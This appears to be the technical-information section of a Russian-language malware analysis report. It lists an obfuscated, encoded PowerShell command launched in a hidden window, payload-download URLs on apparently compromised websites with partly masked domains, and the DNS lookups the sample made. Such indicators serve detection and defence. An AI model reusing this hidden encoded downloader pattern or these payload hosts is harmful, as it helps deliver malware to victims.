Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABlAGMAbwBtAG0AZQByAGMAZQBpAHUAbgA9ACcAcwB1AHAAZQByAHMAdAByAHUAYwB0AHUAcgBlAGsAcQBhACcAOwAkAEYAcgB...
- 'th####kconcept.com':80
- 'li######ppetschildcare.com':80
- 'ru##vet.net':80
- http://th####kconcept.com/cgi-bin/gXLEOznm/
- http://li######ppetschildcare.com/wp-content/d0u884f-z1cajbo9s-36678/
- http://ru##vet.net/wp-admin/KrcbLxRv/
- DNS ASK n0####lkeeper.com
- DNS ASK th####kconcept.com
- DNS ASK li######ppetschildcare.com
- DNS ASK en####sensorium.com
- DNS ASK ru##vet.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABlAGMAbwBtAG0AZQByAGMAZQBpAHUAbgA9ACcAcwB1AHAAZQByAHMAdAByAHUAYwB0AHUAcgBlAGsAcQBhACcAOwAkAEYAcgB...' (со скрытым окном)